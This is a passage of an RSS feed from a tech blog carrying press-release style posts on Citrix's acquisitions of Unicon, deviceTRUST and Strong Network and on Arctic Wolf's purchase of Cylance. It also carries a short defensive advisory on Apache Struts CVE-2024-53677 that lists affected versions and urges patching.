		<category><![CDATA[elux]]></category>
		<category><![CDATA[scout]]></category>
		<category><![CDATA[secure client os]]></category>
		<category><![CDATA[unicon]]></category>
		<category><![CDATA[VDI]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=34816</guid>

					<description><![CDATA[Citrix, a business unit of Cloud Software Group, Inc., has announced the strategic acquisition of Unicon GmbH, a Citrix Ready partner and provider of the secure endpoint operating system (OS), eLuxⓇ, along with the enterprise management platform, Scout™. With the acquisition of Unicon, Citrix will provide customers with a secure client OS and endpoint management that dramatically improves [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-acquisition-of-unicon%2F&amp;linkname=Citrix%20announces%20acquisition%20of%20Unicon" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-acquisition-of-unicon%2F&amp;linkname=Citrix%20announces%20acquisition%20of%20Unicon" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-acquisition-of-unicon%2F&amp;linkname=Citrix%20announces%20acquisition%20of%20Unicon" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-acquisition-of-unicon%2F&amp;linkname=Citrix%20announces%20acquisition%20of%20Unicon" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-acquisition-of-unicon%2F&amp;linkname=Citrix%20announces%20acquisition%20of%20Unicon" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-acquisition-of-unicon%2F&amp;linkname=Citrix%20announces%20acquisition%20of%20Unicon" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="535" src="http://www.ervik.as/wp-content/uploads/2025/01/citrix-unicon-social-1024x535.png" alt="Citrix announces acquisition of Unicon" class="wp-image-34817" style="width:661px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2025/01/citrix-unicon-social-1024x535.png 1024w, https://www.ervik.as/wp-content/uploads/2025/01/citrix-unicon-social-300x157.png 300w, https://www.ervik.as/wp-content/uploads/2025/01/citrix-unicon-social-768x401.png 768w, https://www.ervik.as/wp-content/uploads/2025/01/citrix-unicon-social-1536x803.png 1536w, https://www.ervik.as/wp-content/uploads/2025/01/citrix-unicon-social-2048x1070.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Citrix announces acquisition of Unicon</figcaption></figure>



<p>Citrix, a business unit of Cloud Software Group, Inc., has announced the strategic acquisition of <a href="https://www.unicon.com/" target="_blank" rel="noreferrer noopener">Unicon</a> GmbH, a Citrix Ready partner and provider of the secure endpoint operating system (OS), eLux<sup>Ⓡ</sup>, along with the enterprise management platform, Scout<sup><img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /></sup>.</p>



<p>With the acquisition of Unicon, <a href="https://www.ervik.as/citrix">Citrix</a> will provide customers with a secure client OS and endpoint management that dramatically improves endpoint security, resiliency and operational costs, while providing a seamless end-to-end experience for access to corporate applications and desktops. In addition, enterprise customers can leverage eLux to extend the life of their current assets as they look to the upcoming Windows 10 end of support.</p>



<p>“The hybrid work model embraced by countless companies today brings tremendous opportunities for employees, as well as challenges for IT teams who must balance security, performance, scalability, and cost savings,” said Sridhar Mullapudi, co-president of Citrix. “Our acquisition of Unicon will enable our customers to maximize the value of their endpoints, giving users secure access to the Citrix platform without the need for additional software purchases. We are proud to welcome Unicon to the Citrix family and look forward to supporting today’s evolving workforce.”</p>



<p><strong>Key benefits include:</strong></p>



<ul class="wp-block-list">
<li><strong>Enhanced user experience: </strong>pairing Unicon’s hybrid client solutions with Citrix’s virtual desktop and application delivery solutions enhances user experiences in hybrid work scenarios, providing seamless, secure access across diverse environments.</li>



<li><strong>New use cases:</strong> by integrating additional platform technologies such as Citrix<strong>Ⓡ</strong> Enterprise Browser and Strong Network into eLux, customers can provide access to next generation Progressive Web Apps (PWAs) and browser-based applications with a native end-user experience and no additional software. They can even expand to new personas, such as developers.</li>



<li><strong>Robust endpoint management:</strong> part of the Unicon portfolio, Scout along with Scout<strong><img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /></strong> Cloud Gateway provide a robust endpoint management solution for devices running eLux. With these management products together, companies can quickly and securely manage endpoints devices in remote environments. This means seamless integration with the entire Citrix platform, providing customers with seamless and secure access to Virtual Desktops (VDI), Desktop-as-a-Service (DaaS), and web applications across on-premises, hybrid, and cloud environments.</li>



<li><strong>Consolidation with increased value:</strong> including an endpoint OS within the Citrix platform greatly expands the value for customers, enabling the repurposing of devices to access VDIs on-premises or in the Cloud, or SaaS-based services. Ideal for workforces in healthcare, finance and other task workers, this integration enables customers to consume Windows 365 or AWS Workspaces Core supported by the best, most secure experience in the industry and without the need to purchase an additional endpoint OS license. We plan to include Unicon in our core offerings, the Citrix Platform License and the Universal Hybrid Multi-Cloud License.</li>
</ul>



<h2 class="wp-block-heading">Proven Solutions for Global Organizations</h2>



<p>Founded in Germany over 30 years ago, Unicon’s eLux OS is deployed to more than 2.5 million endpoint devices across 65+ countries, including large-scale customers with fleets of 300,000+ endpoint devices.&nbsp;</p>



<p>Unicon’s eLux OS and Scout management platform help organizations repurpose existing devices, reduce hardware waste, and support green IT initiatives, offering a seamless and cost-effective experience:</p>



<ul class="wp-block-list">
<li><strong>eLux</strong> provides endpoint security, supports device repurposing, and aligns with green IT goals.</li>



<li><strong>Scout </strong>centralizes IT operations, simplifying application deployment and empowering IT teams to manage endpoints through a single interface</li>
</ul>



<h2 class="wp-block-heading">Maximizing Value with Citrix and Unicon Integration</h2>



<p>The technology partnership between Citrix and Unicon has been in place since 2001. eLux is seamlessly integrated with Citrix<sup>Ⓡ</sup>&nbsp;technologies like Virtual Apps and Desktops (VDI), Desktop-as-a-Service (DaaS), and the Citrix<sup>Ⓡ</sup>&nbsp;Enterprise Browser. This integration ensures a secure and high-performance user experience. Customers can repurpose existing devices to access VDIs on-premises or in the cloud, as well as SaaS services, in a more cost-effective way.</p>



<h2 class="wp-block-heading">Driving Innovation and Sustainability</h2>



<p>Citrix’s acquisition of Unicon follows its recent&nbsp;<a href="https://www.citrix.com/news/announcements/dec-2024/citrix-strengthens-commitment-to-zerotrust-security-with-key-acquisitions-delivering-hybrid-security-for-hybrid-workers-through-the-citrix-platform.html" target="_blank" rel="noopener">purchases of deviceTRUST and Strong Network</a>, reinforcing its commitment to zero-trust security and hybrid work models. Together, Citrix and Unicon are addressing the needs of industries such as finance, public sectors, and healthcare by offering:</p>



<ul class="wp-block-list">
<li>Cost-effective endpoint management with no additional OS license requirements. </li>



<li>Enhanced sustainability by extending the lifecycle of existing devices.</li>



<li>Scalable solutions that support hybrid work environments.</li>
</ul>



<p>“Unicon’s solutions, combined with Citrix’s platform, create a powerful synergy for hybrid work,” said Philipp Benkler, former CEO of Unicon and now Vice President of Product at Citrix. “By joining Citrix, we are helping businesses achieve secure, future-ready IT strategies.”</p>



<h2 class="wp-block-heading">A Unified Vision for the Future</h2>



<p>Together, Citrix and Unicon are redefining hybrid work environments, offering secure, scalable, and sustainable solutions to meet the needs of today’s enterprises.</p>



<p>“With eLux and Scout as part of our platform, Citrix is delivering a comprehensive solution for organizations seeking to enhance security, reduce costs, and embrace sustainable IT practices,” said Citrix’s Mullapudi.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CVE-2024-53677 &#8211; Exploitation Attempts of Critical Apache Struts RCE Vulnerability</title>
		<link>https://www.ervik.as/cve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 19 Dec 2024 17:58:31 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Apache Struts]]></category>
		<category><![CDATA[CVE]]></category>
		<category><![CDATA[CVE-2024-53677]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<category><![CDATA[PAN-OS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=33706</guid>

					<description><![CDATA[On December 15, 2024, reports emerged that threat actors have begun attempting to exploit a recently disclosed critical vulnerability in Apache Struts (CVE-2024-53677) shortly after the publication of a Proof-of-Concept (PoC) exploit.  Apache Struts is a widely used open-source web application framework for developing Java-based applications. CVE-2024-53677 is a file upload path traversal vulnerability in Struts that [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability%2F&amp;linkname=CVE-2024-53677%20%E2%80%93%20Exploitation%20Attempts%20of%20Critical%20Apache%20Struts%20RCE%20Vulnerability" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability%2F&amp;linkname=CVE-2024-53677%20%E2%80%93%20Exploitation%20Attempts%20of%20Critical%20Apache%20Struts%20RCE%20Vulnerability" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability%2F&amp;linkname=CVE-2024-53677%20%E2%80%93%20Exploitation%20Attempts%20of%20Critical%20Apache%20Struts%20RCE%20Vulnerability" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability%2F&amp;linkname=CVE-2024-53677%20%E2%80%93%20Exploitation%20Attempts%20of%20Critical%20Apache%20Struts%20RCE%20Vulnerability" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability%2F&amp;linkname=CVE-2024-53677%20%E2%80%93%20Exploitation%20Attempts%20of%20Critical%20Apache%20Struts%20RCE%20Vulnerability" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcve-2024-53677-exploitation-attempts-of-critical-apache-struts-rce-vulnerability%2F&amp;linkname=CVE-2024-53677%20%E2%80%93%20Exploitation%20Attempts%20of%20Critical%20Apache%20Struts%20RCE%20Vulnerability" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024.jpeg" alt="CVE-2024-53677: Exploitation Attempts of Critical Apache Struts RCE Vulnerability Following PoC Release" class="wp-image-33709" style="width:324px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-300x300.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-150x150.jpeg 150w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-768x768.jpeg 768w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1536x1536.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k-1024x1024-50x50.jpeg 50w, https://www.ervik.as/wp-content/uploads/2024/12/Gemini_Generated_Image_t18k7ut18k7ut18k.jpeg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">On December 15, 2024, <a href="https://isc.sans.edu/diary/31520" target="_blank" rel="noreferrer noopener">reports</a> emerged that threat actors have begun attempting to exploit a recently disclosed critical <a href="https://www.ervik.as/cyber-security-news/">vulnerability</a> in Apache Struts (CVE-2024-53677) shortly after the publication of a Proof-of-Concept (PoC) exploit. </h2>



<p>Apache Struts is a widely used open-source web application framework for developing Java-based applications. CVE-2024-53677 is a file upload path traversal vulnerability in Struts that allows attackers to upload files to restricted directories, potentially leading to Remote Code Execution (RCE) if a webshell is uploaded and exposed in the web root. The fix for this vulnerability was released on December 10th.&nbsp;</p>



<p>Apache Struts has been an attractive target for threat actors, as evidenced by several RCE vulnerabilities affecting Apache Struts being listed in CISA’s Known Exploited Vulnerabilities Catalog. Threat actors may target CVE-2024-53677 in the near term due to the publicly accessible PoC, which lowers the barrier to exploitation. Exploitation attempts have quickly followed PoC releases, as&nbsp;<a href="https://arcticwolf.com/resources/blog/follow-up-cve-2024-0012-cve-2024-9474/" target="_blank" rel="noopener">demonstrated</a>&nbsp;by the surge in attempts after the publication of PoC exploit code for CVE-2024-0012 and CVE-2024-9474 in Palo Alto Networks PAN-OS in November.&nbsp;</p>



<h2 class="wp-block-heading">Recommendations&nbsp;for CVE-2024-53677</h2>



<h3 class="wp-block-heading">Upgrade to Latest Fixed Version</h3>



<p>Where feasible, Arctic Wolf&nbsp;<strong>strongly recommends</strong>&nbsp;upgrading Apache Struts to the latest version.&nbsp;</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Product</strong>&nbsp;</td><td><strong>Affected Version</strong>&nbsp;</td><td><strong>Fixed Version</strong>&nbsp;</td></tr><tr><td rowspan="3">Apache Struts&nbsp;</td><td>2.0.0 – 2.3.37 (<a href="https://struts.apache.org/struts23-eol-announcement" target="_blank" rel="noreferrer noopener">EOL</a>)&nbsp;</td><td rowspan="3">6.4.0 or later, and must migrate to the new&nbsp;<a href="https://struts.apache.org/core-developers/file-upload" target="_blank" rel="noreferrer noopener">file upload mechanism</a>.&nbsp;</td></tr><tr><td>2.5.0 – 2.5.33&nbsp;</td></tr><tr><td>6.0.0 – 6.3.0.2&nbsp;</td></tr></tbody></table></figure>



<p><strong>This update is not backward compatible, meaning you must modify the code in your application(s) responsible for handling user actions, such as file uploads, to use the new Action File Upload mechanism and its associated interceptor. Continuing to use the old file upload mechanism will leave your application vulnerable to this attack.</strong>&nbsp;</p>



<p>Please follow your organization’s patching and testing guidelines to minimize potential operational impact.&nbsp;</p>



<h3 class="wp-block-heading">Closely Monitor Software Vendor Patch Advisories Related to CVE-2024-53677</h3>



<p>While Apache has released a fix for CVE-2024-53677,&nbsp;<strong>the security patch is not automatically applied to software products that use the framework.</strong>&nbsp;The best method for remediating CVE-2023-50164 in third-party software products is to apply the official security updates from the vendor of each affected software product.&nbsp;</p>



<p><a href="https://arcticwolf.com/resources/blog/cve-2024-53677/" target="_blank" data-type="link" data-id="https://arcticwolf.com/resources/blog/cve-2024-53677/" rel="noreferrer noopener nofollow">Learn more here</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Arctic Wolf to acquire Cylance endpoint security</title>
		<link>https://www.ervik.as/arctic-wolf-to-acquire-cylance-endpoint-security/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Mon, 16 Dec 2024 14:18:39 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[Blackberry]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Cylance]]></category>
		<category><![CDATA[EPP]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[soc]]></category>
		<category><![CDATA[XDR]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=33618</guid>

					<description><![CDATA[Arctic Wolf® and BlackBerry Limited (NYSE: BB; TSX:BB), two global leaders in security software and services, has announced they have entered into a definitive agreement for Arctic Wolf to acquire BlackBerry’s Cylance endpoint security assets. Cylance is the pioneer of AI-based endpoint protection trusted by thousands of organizations around the world. With this acquisition, Arctic Wolf ushers [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-to-acquire-cylance-endpoint-security%2F&amp;linkname=Arctic%20Wolf%20to%20acquire%20Cylance%20endpoint%20security" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-to-acquire-cylance-endpoint-security%2F&amp;linkname=Arctic%20Wolf%20to%20acquire%20Cylance%20endpoint%20security" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-to-acquire-cylance-endpoint-security%2F&amp;linkname=Arctic%20Wolf%20to%20acquire%20Cylance%20endpoint%20security" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-to-acquire-cylance-endpoint-security%2F&amp;linkname=Arctic%20Wolf%20to%20acquire%20Cylance%20endpoint%20security" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-to-acquire-cylance-endpoint-security%2F&amp;linkname=Arctic%20Wolf%20to%20acquire%20Cylance%20endpoint%20security" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Farctic-wolf-to-acquire-cylance-endpoint-security%2F&amp;linkname=Arctic%20Wolf%20to%20acquire%20Cylance%20endpoint%20security" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large is-resized"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='535'%20viewBox=%270%200%201024%20535%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="1024" height="535" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-1024x535.jpeg" alt="Arctic Wolf to acquire Cylance endpoint security" class="tf_svg_lazy wp-image-33619" style="background:linear-gradient(to right,#ffffff 25%,#ffffff 25% 50%,#ffffff 50% 75%,#ffffff 75%),linear-gradient(to right,#ecffff 25%,#feffff 25% 50%,#ffffff 50% 75%,#fafafa 75%),linear-gradient(to right,#ffffff 25%,#ffffff 25% 50%,#ffffff 50% 75%,#ffffff 75%),linear-gradient(to right,#ffffff 25%,#ffffff 25% 50%,#ffffff 50% 75%,#ffffff 75%);width:919px;height:auto" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-1024x535.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-300x157.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-768x401.jpeg 768w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-1536x802.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance.jpeg 2048w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="535" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-1024x535.jpeg" alt="Arctic Wolf to acquire Cylance endpoint security" class="wp-image-33619" style="width:919px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-1024x535.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-300x157.jpeg 300w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-768x401.jpeg 768w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance-1536x802.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2024/12/arctic-wolf-blackberry-cylance.jpeg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<h2 class="wp-block-heading"><a href="https://arcticwolf.com/" target="_blank" rel="noopener">Arctic Wolf</a>® and <a href="https://www.blackberry.com/us/en" target="_blank" rel="noopener">BlackBerry Limited</a> (NYSE: BB; TSX:BB), two global leaders in security software and services, has announced they have entered into a definitive agreement for Arctic Wolf to acquire BlackBerry’s Cylance endpoint security assets. Cylance is the pioneer of AI-based endpoint protection trusted by thousands of organizations around the world. With this acquisition, Arctic Wolf ushers in a new era of simplicity, flexibility, and outcomes to the endpoint security market, delivering the security operations results customers have been asking for.</h2>



<p>Under the terms of the agreement, BlackBerry will sell its Cylance endpoint security assets to<a href="https://www.ervik.as/soc/arctic-wolf/"> Arctic Wolf</a> for $160 million of cash, subject to certain adjustments, and approximately 5.5 million common shares of Arctic Wolf. After allowing for the purchase price adjustments, BlackBerry will receive approximately $80 million of cash at closing and approximately $40 million of cash one year following the closing.</p>



<p>The proposed transaction is subject to customary closing conditions and is expected to close in BlackBerry’s fourth fiscal quarter.</p>



<p>Arctic Wolf is a leader in AI-powered security operations, delivering its solutions from a single open platform to meet customers’ needs for effective, comprehensive, and reliable security outcomes. With the addition of Cylance’s trailblazing suite of Cylance endpoint security capabilities and enhanced AI functionality, Arctic Wolf will bolster its position as a market-leading platform provider, offering coverage from the endpoint to the edge.</p>



<p>As many organizations are looking to consolidate an increasing number of disparate security tools, there is a rapidly growing demand for end-to-end platforms.</p>



<p>“Security has an operations and effectiveness problem and endpoint solutions alone have failed to live up to the outcomes they have promised for years,” said Nick Schneider, president and chief executive officer, Arctic Wolf. “By incorporating Cylance endpoint security capabilities into our open-XDR Aurora platform, we will be addressing a rampant need for a truly unified, effective security operations that delivers better outcomes for customers. We believe we will be able to rapidly eliminate alert fatigue, reduce total risk exposure, and help customers unlock further value with our warranty and insurability programs.”</p>



<p>“I am incredibly excited to partner with Arctic Wolf through this agreement,” said John Giamatteo, chief executive officer of BlackBerry. “We see this transaction as a win-win for our shareholders and all other stakeholders. Our customers will realize the benefits of continuity of service and the expertise that a global cybersecurity leader like Arctic Wolf provides. Arctic Wolf benefits by adding Cylance’s endpoint security solutions to its native platform. Finally, as Arctic Wolf leverages its scale to build upon and grow the Cylance business, BlackBerry will benefit as a reseller of the portfolio to our large government customers and as a shareholder of the company.”</p>



<p>There will be no impact to BlackBerry’s Secure Communications portfolio of businesses, which include BlackBerry® UEM, BlackBerry® AtHoc® and BlackBerry® SecuSUITE®. The Secure Communications business will remain an integral part of the BlackBerry portfolio.</p>



<p><strong>Redefining the Modern Security Platform for Customers and Partners</strong></p>



<p>With the addition of a native Cylance endpoint security solution to its portfolio, Arctic Wolf is building one of the largest open XDR security platforms in the industry, enabling customers and partners to have the option to leverage more than 15 supported endpoint solutions. Arctic Wolf is currently the only security operations leader offering this type of optionality, which combined with its comprehensive approach to minimizing risk through security operations, makes it uniquely positioned to drive value for customers of all sizes and security maturity.</p>



<p>Cylance has a long history of recognition as a market leader, known for stopping 98% of attacks before they begin and trusted by many of the world’s leading organizations for its AI-driven prevention and detection. Recently,&nbsp;<a href="https://www.blackberry.com/us/en/company/newsroom/press-releases/2024/customers-have-spoken-gartner-peer-insights-names-blackberry-a-2024-customers-choice-for-endpoint-protection-platforms" target="_blank" rel="noopener">Cylance was named</a>&nbsp;2024 Customers’ Choice for endpoint protection platforms (EPP) by Gartner® Peer Insights<img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> for the second consecutive year. By integrating Cylance into its portfolio, Arctic Wolf will provide a world-class endpoint protection solution that rivals the best in the industry, complementing its endpoint offering with one of the largest commercial SOCs in the world&nbsp;that delivers unified security operations and comprehensive attack surface coverage.</p>



<p>“Organizations are looking to unify tools and operations via a single platform that can effectively analyze and respond to security threats, drive consistent security outcomes, and demonstrably minimize risk,” said Dan Schiappa, chief product and services officer, Arctic Wolf. “In the past, this has been a near-impossible, costly goal for resource-constrained leaders. By adding endpoint security to our platform, we will be delivering the security outcomes organizations want in one, frictionless operational platform to go toe-to-toe with today’s advanced threats, while maintaining our commitment to customers and partners leveraging other endpoint solutions.”</p>



<p>Perella Weinberg Partners LP served as exclusive financial adviser to BlackBerry and Morrison Foerster LLP served as legal adviser to BlackBerry. Cooley LLP served as legal adviser to Arctic Wolf.</p>



<p>Join BlackBerry’s CEO and CFO today, Monday, December 16, at 5:30 p.m.&nbsp;ET&nbsp;for more information on today’s announcement. &nbsp; The call, which will be live streamed to the general public, can be accessed using the following link (<a href="https://www.webcaster4.com/Webcast/Page/3063/51772" target="_blank" rel="noopener">here</a>), through the Company’s investor webpage&nbsp;<a href="https://investors.blackberry.com/" target="_blank" rel="noopener">(BlackBerry.com/Investors</a>), or by dialing toll free +1 (844) 763-8275 and entering Elite Entry Number 51772. &nbsp;A replay will be available at approximately 8:30 p.m. ET today, using the same webcast link&nbsp;<a href="https://www.webcaster4.com/Webcast/Page/3063/51772" target="_blank" rel="noopener">(here</a>) or by dialing toll free +1 (877) 481-4010 and entering Replay Access Code 51772.</p>



<p>Read more about Arctic Wolf’s intent to acquire Cylance in a&nbsp;<a href="https://arcticwolf.com/resources/blog/advancing-the-arctic-wolf-aurora-platform-with-cylances-endpoint-security-suite/" target="_blank" rel="noopener">blog post</a>&nbsp;from Arctic Wolf’s Chief Product and Services Officer, Dan Schiappa.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Citrix acquires deviceTRUST and Strong Network</title>
		<link>https://www.ervik.as/citrix-acquires-devicetrust-and-strong-network/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 10:41:29 +0000</pubDate>
				<category><![CDATA[Citrix]]></category>
		<category><![CDATA[Citrix Secure Private Access]]></category>
		<category><![CDATA[DaaS]]></category>
		<category><![CDATA[deviceTRUST]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SPA]]></category>
		<category><![CDATA[Strong Network]]></category>
		<category><![CDATA[VDI]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=33473</guid>

					<description><![CDATA[Citrix acquires deviceTRUST and Strong Network. Through the acquisitions of deviceTRUST and Strong Network, Citrix customers will gain real-time protection for VDI and DaaS users, secure cloud development environments for developers, and expanded capability to protect access to all applications and data in hybrid environments with Citrix Secure Private Access. With the widespread adoption of [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-acquires-devicetrust-and-strong-network%2F&amp;linkname=Citrix%20acquires%20deviceTRUST%20and%20Strong%20Network" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-acquires-devicetrust-and-strong-network%2F&amp;linkname=Citrix%20acquires%20deviceTRUST%20and%20Strong%20Network" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-acquires-devicetrust-and-strong-network%2F&amp;linkname=Citrix%20acquires%20deviceTRUST%20and%20Strong%20Network" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-acquires-devicetrust-and-strong-network%2F&amp;linkname=Citrix%20acquires%20deviceTRUST%20and%20Strong%20Network" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-acquires-devicetrust-and-strong-network%2F&amp;linkname=Citrix%20acquires%20deviceTRUST%20and%20Strong%20Network" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-acquires-devicetrust-and-strong-network%2F&amp;linkname=Citrix%20acquires%20deviceTRUST%20and%20Strong%20Network" title="Email" rel="nofollow noopener" target="_blank"></a></p>
